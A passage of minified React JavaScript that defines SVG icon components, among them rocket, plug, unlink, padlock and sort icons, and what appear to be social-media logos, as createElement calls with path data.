6.25 21.75H4C3.0335 21.75 2.25 20.9665 2.25 20V18.5C2.25 17.5335 3.0335 16.75 4 16.75H6.25C7.2165 16.75 8 17.5335 8 18.5V20Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M13.5 18.5C13.5 18.3619 13.3881 18.25 13.25 18.25H11C10.8619 18.25 10.75 18.3619 10.75 18.5V20C10.75 20.1381 10.8619 20.25 11 20.25H13.25C13.3881 20.25 13.5 20.1381 13.5 20V18.5ZM15 20C15 20.9665 14.2165 21.75 13.25 21.75H11C10.0335 21.75 9.25 20.9665 9.25 20V18.5C9.25 17.5335 10.0335 16.75 11 16.75H13.25C14.2165 16.75 15 17.5335 15 18.5V20Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M20.25 18.5C20.25 18.3619 20.1381 18.25 20 18.25H18C17.8619 18.25 17.75 18.3619 17.75 18.5V20C17.75 20.1381 17.8619 20.25 18 20.25H20C20.1381 20.25 20.25 20.1381 20.25 20V18.5ZM21.75 20C21.75 20.9665 20.9665 21.75 20 21.75H18C17.0335 21.75 16.25 20.9665 16.25 20V18.5C16.25 17.5335 17.0335 16.75 18 16.75H20C20.9665 16.75 21.75 17.5335 21.75 18.5V20Z",fill:"currentColor"}),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M19 15.75C20.5188 15.75 21.75 14.5188 21.75 13V5C21.75 3.4812 20.5188 2.25 19 2.25H5C3.4812 2.25 2.25 3.4812 2.25 5V13C2.25 14.5188 3.4812 15.75 5 15.75H19ZM3.75 11.8613V5C3.75 4.30957 4.30963 3.75 5 3.75H19C19.6904 3.75 20.25 4.30957 20.25 5V10.8613L19.9442 10.5557C18.8703 9.48169 17.1295 9.48169 16.0555 10.5557L15.3837 11.2266C14.8956 11.7146 14.1042 11.7146 13.6161 11.2266L10.9442 8.55566C9.8703 7.48169 8.12946 7.48169 7.05554 8.55566L3.75 11.8613Z",fill:"currentColor"})),rocket_fly_boost_launch_pro_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M7.79289 14.7929C8.18342 14.4024 8.81643 14.4024 9.20696 14.7929C9.59748 15.1834 9.59748 15.8164 9.20696 16.207L4.20696 21.207C3.81643 21.5975 3.18342 21.5975 2.79289 21.207C2.40237 20.8164 2.40237 20.1834 2.79289 19.7929L7.79289 14.7929Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M10.2929 17.2929C10.6834 16.9024 11.3164 16.9024 11.707 17.2929C12.0975 17.6834 12.0975 18.3164 11.707 18.707L9.70696 20.707C9.31643 21.0975 8.68342 21.0975 8.29289 20.707C7.90237 20.3164 7.90237 19.6834 8.29289 19.2929L10.2929 17.2929Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M5.29289 12.2929C5.68342 11.9024 6.31643 11.9024 6.70696 12.2929C7.09748 12.6834 7.09748 13.3164 6.70696 13.707L4.70696 15.707C4.31643 16.0975 3.68342 16.0975 3.29289 15.707C2.90237 15.3164 2.90237 14.6834 3.29289 14.2929L5.29289 12.2929Z",fill:"currentColor"}),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.5002 1.75C21.9145 1.75 22.2502 2.08569 22.2502 2.5V3.10059C22.2502 5.88916 21.0051 8.88525 19.2672 11.1758L19.7473 16.9375C19.7656 17.1575 19.6865 17.3743 19.5305 17.5303L15.5305 21.5303C15.3439 21.717 15.0726 21.792 14.8167 21.7275C14.5609 21.6631 14.3574 21.4685 14.2815 21.2158L12.8049 16.2939L7.7063 11.1953L2.78442 9.71875C2.62842 9.67188 2.49463 9.57642 2.39984 9.4502C2.34113 9.37183 2.29742 9.28149 2.27271 9.18359C2.20819 8.92773 2.28333 8.65649 2.46997 8.46973L6.46997 4.46973L6.53149 4.41504C6.68048 4.29565 6.87042 4.23682 7.06274 4.25293L12.8245 4.73315C15.115 2.99512 18.111 1.75 20.8997 1.75H21.5002ZM19.0002 6.5C19.0002 7.32837 18.3287 8 17.5002 8C16.6718 8 16.0002 7.32837 16.0002 6.5C16.0002 5.67163 16.6718 5 17.5002 5C18.3287 5 19.0002 5.67163 19.0002 6.5Z",fill:"currentColor"})),plugin_connect_socket_integration_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M5.20699 8.79297L6.99995 10.5859L8.79292 8.79297C9.18343 8.40234 9.81642 8.40234 10.207 8.79297C10.5975 9.18335 10.5975 9.81641 10.207 10.207L8.41402 12L12 15.5859L13.7929 13.793C14.1834 13.4023 14.8164 13.4023 15.207 13.793C15.5975 14.1833 15.5975 14.8164 15.207 15.207L13.414 17L15.207 18.793C15.5975 19.1833 15.5975 19.8164 15.207 20.207C14.8164 20.5974 14.1834 20.5974 13.7929 20.207L12.8233 19.2375L10.9445 21.1162C9.87056 22.1902 8.12886 22.1902 7.05489 21.1162L5.67653 19.7375L3.20699 22.207C2.81642 22.5974 2.18343 22.5974 1.79292 22.207C1.40236 21.8164 1.40236 21.1833 1.79292 20.793L4.26265 18.3232L2.88405 16.9443C1.81007 15.8706 1.81007 14.1296 2.88405 13.0557L4.76277 11.177L3.79292 10.207C3.40236 9.81641 3.40236 9.18335 3.79292 8.79297C4.18343 8.40234 4.81642 8.40234 5.20699 8.79297Z",fill:"currentColor"}),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11.1768 4.7627L10.207 3.79297C9.81641 3.40234 9.18341 3.40234 8.79291 3.79297C8.40234 4.18335 8.40234 4.81641 8.79291 5.20703L18.7929 15.207C19.1834 15.5974 19.8164 15.5974 20.207 15.207C20.5975 14.8164 20.5975 14.1833 20.207 13.793L19.2374 12.8232L21.1161 10.9446C22.1901 9.87061 22.1901 8.12891 21.1161 7.05493L19.7374 5.67651L22.207 3.20703C22.5975 2.81641 22.5975 2.18335 22.207 1.79297C21.8164 1.40234 21.1834 1.40234 20.7929 1.79297L18.3232 4.2627L16.9443 2.88403C15.8703 1.81006 14.1295 1.81006 13.0556 2.88403L11.1768 4.7627Z",fill:"currentColor"})),unlink_link_break_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.29286 4.29325C2.68338 3.90273 3.31639 3.90273 3.70692 4.29325L10.9999 11.5862L13.7929 8.79325C14.1834 8.40273 14.8164 8.40273 15.2069 8.79325C15.5972 9.1838 15.5974 9.81687 15.2069 10.2073L12.4139 13.0003L19.7069 20.2933C20.0972 20.6838 20.0974 21.3169 19.7069 21.7073C19.3165 22.0977 18.6834 22.0976 18.2929 21.7073L14.5194 17.9339L12.204 20.2493C9.86964 22.5836 6.08522 22.5835 3.75086 20.2493C1.41651 17.915 1.41657 14.1306 3.75086 11.7962L6.06532 9.47978L2.29286 5.70732C1.90236 5.31682 1.90241 4.68379 2.29286 4.29325ZM5.16493 13.2102C3.61168 14.7636 3.61162 17.2819 5.16493 18.8352C6.71823 20.3884 9.23662 20.3884 10.7899 18.8352L13.1054 16.5198L10.9999 14.4143L10.2069 15.2073C9.81646 15.5977 9.18337 15.5976 8.79286 15.2073C8.40236 14.8168 8.40241 14.1838 8.79286 13.7933L9.58582 13.0003L7.48036 10.8948L5.16493 13.2102Z",fill:"currentColor"}),(0,o.createElement)("path",{d:"M11.7958 3.75126C14.1302 1.4169 17.9145 1.41689 20.2489 3.75126C22.5832 6.08564 22.5833 9.87005 20.2489 12.2044L17.7352 14.719C17.3449 15.1092 16.7117 15.109 16.3212 14.719C15.9307 14.3285 15.9307 13.6945 16.3212 13.304L18.8348 10.7903C20.3881 9.23703 20.3881 6.71866 18.8348 5.16533C17.2815 3.612 14.7632 3.61201 13.2098 5.16533L10.6962 7.679C10.3057 8.06941 9.67164 8.06939 9.28114 7.679C8.89103 7.28851 8.89092 6.65536 9.28114 6.26493L11.7958 3.75126Z",fill:"currentColor"})),unlocked_open_security_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1C15.3136 1.00007 18 3.68634 18 7V9.25C19.5188 9.25 20.75 10.4812 20.75 12V20C20.75 21.5188 19.5188 22.75 18 22.75H6C4.48122 22.75 3.25 21.5188 3.25 20V12C3.25 10.4812 4.48122 9.25 6 9.25H16V7C16 4.79091 14.2091 3.00007 12 3C10.5207 3.00001 9.22731 3.80281 8.53418 5.00098C8.25756 5.47873 7.6459 5.64163 7.16797 5.36523C6.69018 5.0886 6.52723 4.47697 6.80371 3.99902C7.83968 2.20846 9.77808 1.00001 12 1ZM12 14.5C11.4477 14.5 11 14.9477 11 15.5V16.5C11 17.0523 11.4477 17.5 12 17.5C12.5523 17.5 13 17.0523 13 16.5V15.5C13 14.9477 12.5523 14.5 12 14.5Z",fill:"currentColor"})),sort_ascending_order_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.25 5C2.25 3.4812 3.4812 2.25 5 2.25L19 2.25C20.5188 2.25 21.75 3.4812 21.75 5L21.75 19C21.75 20.5188 20.5188 21.75 19 21.75L5 21.75C3.4812 21.75 2.25 20.5188 2.25 19L2.25 5ZM16.75 7.5C16.75 7.08569 16.4142 6.75 16 6.75L6 6.75C5.58581 6.75 5.25 7.08569 5.25 7.5C5.25 7.91431 5.58581 8.25 6 8.25L16 8.25C16.4142 8.25 16.75 7.91431 16.75 7.5ZM11.5 11C11.9142 11 12.25 11.3357 12.25 11.75C12.25 12.1643 11.9142 12.5 11.5 12.5L6 12.5C5.58581 12.5 5.25 12.1643 5.25 11.75C5.25 11.3357 5.58581 11 6 11L11.5 11ZM10.75 16C10.75 15.5857 10.4142 15.25 10 15.25L6 15.25C5.58581 15.25 5.25 15.5857 5.25 16C5.25 16.4143 5.58581 16.75 6 16.75L10 16.75C10.4142 16.75 10.75 16.4143 10.75 16ZM15.25 11C15.25 10.5857 15.5857 10.25 16 10.25C16.4142 10.25 16.75 10.5857 16.75 11L16.75 15.1895L17.9697 13.9697C18.2626 13.6768 18.7373 13.6768 19.0303 13.9697C19.3231 14.2627 19.3231 14.7373 19.0303 15.0303L16.5303 17.5303C16.2373 17.8232 15.7626 17.8232 15.4697 17.5303L12.9697 15.0303C12.6768 14.7373 12.6768 14.2627 12.9697 13.9697C13.2626 13.6768 13.7373 13.6768 14.0303 13.9697L15.25 15.1895L15.25 11Z",fill:"currentColor"})),sort_descending_order_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 19C21.75 20.5188 20.5188 21.75 19 21.75H5C3.4812 21.75 2.25 20.5188 2.25 19V5C2.25 3.4812 3.4812 2.25 5 2.25H19C20.5188 2.25 21.75 3.4812 21.75 5V19ZM10.75 8C10.75 8.41431 10.4142 8.75 10 8.75H6C5.58582 8.75 5.25 8.41431 5.25 8C5.25 7.58569 5.58582 7.25 6 7.25H10C10.4142 7.25 10.75 7.58569 10.75 8ZM11.5 13C11.9142 13 12.25 12.6643 12.25 12.25C12.25 11.8357 11.9142 11.5 11.5 11.5H6C5.58582 11.5 5.25 11.8357 5.25 12.25C5.25 12.6643 5.58582 13 6 13H11.5ZM6 15.75H16C16.4142 15.75 16.75 16.0857 16.75 16.5C16.75 16.9143 16.4142 17.25 16 17.25H6C5.58582 17.25 5.25 16.9143 5.25 16.5C5.25 16.0857 5.58582 15.75 6 15.75ZM15.25 13V8.81055L14.0303 10.0303C13.7373 10.3232 13.2626 10.3232 12.9697 10.0303C12.6768 9.73755 12.6768 9.2627 12.9697 8.96973L15.4697 6.46973L15.5264 6.41797C15.8209 6.17773 16.2556 6.19531 16.5303 6.46973L19.0303 8.96973C19.3231 9.2627 19.3231 9.73755 19.0303 10.0303C18.7373 10.3232 18.2626 10.3232 17.9697 10.0303L16.75 8.81055V13C16.75 13.4143 16.4142 13.75 16 13.75C15.5857 13.75 15.25 13.4143 15.25 13Z",fill:"currentColor"})),plus_circle_zoom_in_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75ZM11 16.9999V12.9999H7C6.44771 12.9999 6 12.5522 6 11.9999C6.00006 11.4477 6.44775 10.9999 7 10.9999H11V6.99988C11 6.4476 11.4477 5.99988 12 5.99988C12.5523 5.99988 13 6.4476 13 6.99988V10.9999H17C17.5522 10.9999 17.9999 11.4477 18 11.9999C18 12.5522 17.5523 12.9999 17 12.9999H13V16.9999C13 17.5522 12.5523 17.9999 12 17.9999C11.4477 17.9999 11 17.5522 11 16.9999Z",fill:"currentColor"})),right_circle_solid:(0,o.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12 1.25C6.06294 1.25 1.25 6.06294 1.25 12C1.25 17.9371 6.06294 22.75 12 22.75C17.9371 22.75 22.75 17.9371 22.75 12C22.75 6.06294 17.9371 1.25 12 1.25ZM16.7372 9.67573C17.1103 9.26861 17.0828 8.63604 16.6757 8.26285C16.2686 7.88966 15.636 7.91716 15.2628 8.32428L10.4686 13.5544L8.70711 11.7929C8.31658 11.4024 7.68342 11.4024 7.29289 11.7929C6.90237 12.1834 6.90237 12.8166 7.29289 13.2071L9.79289 15.7071C9.98576 15.9 10.249 16.0057 10.5217 15.9998C10.7944 15.9938 11.0528 15.8768 11.2372 15.6757L16.7372 9.67573Z",fill:"currentColor"}))}},64766:(e,t,l)=>{"use strict";l.d(t,{ZP:()=>c,_Y:()=>p,dX:()=>s});var o=l(67294),a=l(71900),i=l(34528);(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 100 99.964"},(0,o.createElement)("path",{d:"M97.637 61.79a3.8 3.8 0 0 1-.265-2.338c2.854-16.467-1.618-30.679-13.443-42.449A46.289 46.289 0 0 0 57.307 3.971a45.987 45.987 0 0 0-13.429.031 3.88 3.88 0 0 1-2.678-.468 27.868 27.868 0 0 0-37.106 9.469 27.009 27.009 0 0 0-.722 27.349 2.2 2.2 0 0 1 .268 1.577c-4.109 21.989 7.627 42.639 27.735 51.084a48.685 48.685 0 0 0 26.784 3.2 3.168 3.168 0 0 1 2.058.3 28.253 28.253 0 0 0 14.99 3.392 24.78 24.78 0 0 0 10.7-3.344 28.036 28.036 0 0 0 13.784-19.714 26.476 26.476 0 0 0-2.054-15.057Zm-22.9 2.118c-1.145 6.065-5.1 9.919-10.639 12.005a34.579 34.579 0 0 1-25.014.047 17.5 17.5 0 0 1-10.124-9.767 10.7 10.7 0 0 1-.823-3.5 4.786 4.786 0 0 1 2.69-4.8 5.42 5.42 0 0 1 5.954.641 8.434 8.434 0 0 1 1.858 2.609c.575 1.166 1.117 2.344 1.763 3.477a10.145 10.145 0 0 0 8.116 5.239c3.849.439 7.6.181 11.051-1.866 3.034-1.8 4.327-4.8 3.344-7.958a6.789 6.789 0 0 0-3.821-3.96 36.8 36.8 0 0 0-8.484-2.527c-4.659-1.075-9.32-2.134-13.636-4.306-6.146-3.093-8.925-8.983-7.25-15.629a12.974 12.974 0 0 1 5.917-7.83 26.362 26.362 0 0 1 12.494-3.723c1.1-.089 2.212-.11 2.953-.145 5.344.04 10.179.739 14.54 3.347 3.038 1.816 5.483 4.183 6.521 7.712a5.465 5.465 0 0 1-1.221 5.8 5.212 5.212 0 0 1-8.142-.932c-.8-1.185-1.506-2.436-2.312-3.618a9.062 9.062 0 0 0-6.6-4.222c-3.583-.437-7.092-.415-10.344 1.435a5.654 5.654 0 0 0-3.072 3.721c-.446 2.16.408 3.849 2.36 5.136 2.449 1.616 5.253 2.209 8.032 2.887a123.979 123.979 0 0 1 12.525 3.358 19.776 19.776 0 0 1 8.3 4.956c3.252 3.573 3.917 7.862 3.06 12.414Z"})),(0,o.createElement)("svg",{viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9.34084 11.3521L7.66481 13.0281C6.36891 14.324 4.26783 14.324 2.97193 13.0281C1.67602 11.7322 1.67602 9.63111 2.97193 8.33521L4.64796 6.65918M6.65916 4.64795L8.33519 2.97193C9.63109 1.67603 11.7322 1.67602 13.0281 2.97192C14.324 4.26782 14.324 6.36889 13.0281 7.66479L11.352 9.34082",stroke:"currentColor",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6.33398 9.66665L9.66732 6.33331",stroke:"currentColor",strokeLinecap:"round"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{fill:"currentColor",d:"M50 4.4v41.1c0 2.5-2 4.4-4.4 4.4H34.5V31.1c0-.4.1-.6.5-.5h5.4c.4 0 .6 0 .6-.5.3-2.3.6-4.6.9-7 0-.4-.1-.4-.4-.4h-6.6c-.3 0-.5-.1-.5-.4v-4.8c-.1-1.5 1-2.9 2.6-3H41.6c.3 0 .4-.1.4-.4V7.9c0-.4-.1-.4-.5-.4-1.5 0-6.7 0-7.8.2-4 .7-6.9 4-7.2 8.1-.1 2.2 0 4.4 0 6.6 0 .5-.1.6-.6.6h-5.5c-.3 0-.4.1-.4.4v7c0 .3.1.4.4.4h5.5c.5 0 .6.1.6.6v18.8H4.4C2 50 0 48 0 45.5V4.4C0 2 2 0 4.4 0h41.1C48 0 50 2 50 4.4z"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 35.699 50"},(0,o.createElement)("path",{d:"M27.638 5.514A13.716 13.716 0 0 1 26.162 0h-6.835v28.914a6.244 6.244 0 1 1-6.241-6.247 6.086 6.086 0 0 1 1.965.32v-7.002a12.836 12.836 0 0 0-1.965-.149A13.082 13.082 0 1 0 26.16 28.918V14.134a17.847 17.847 0 0 0 10.454 3.277l.162-6.834c-4.405-.105-7.4-1.761-9.14-5.063"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m11.606 21.714a11.347 11.347 0 0 1-6.656-2.086v9.413a8.323 8.323 0 1 1-7.076-8.236v4.461a3.9 3.9 0 0 0-1.251-.2 3.978 3.978 0 1 0 3.974 3.977V10.628h4.353a8.761 8.761 0 0 0 .94 3.514c1.112 2.1 3.015 3.156 5.821 3.223Z"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M30.889 22a8.883 8.883 0 0 1-8.976 8.888A8.932 8.932 0 1 1 30.889 22"}),(0,o.createElement)("path",{d:"M22 0C1.18 0 0 1.179 0 22s1.18 22 22 22 22-1.179 22-22S42.821 0 22 0m0 35.816A13.818 13.818 0 1 1 35.816 22 13.817 13.817 0 0 1 22 35.816m14.362-24.948a3.194 3.194 0 0 1-3.256-3.256 3.248 3.248 0 0 1 3.256-3.256 3.175 3.175 0 0 1 3.168 3.256 3.123 3.123 0 0 1-3.168 3.256"}))),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("path",{d:"M37.53 0H4.47A4.468 4.468 0 0 0 0 4.47v33.06A4.468 4.468 0 0 0 4.47 42h33.06A4.468 4.468 0 0 0 42 37.53V4.47A4.468 4.468 0 0 0 37.53 0M12.49 35.12c0 .51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,o.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,o.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,o.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 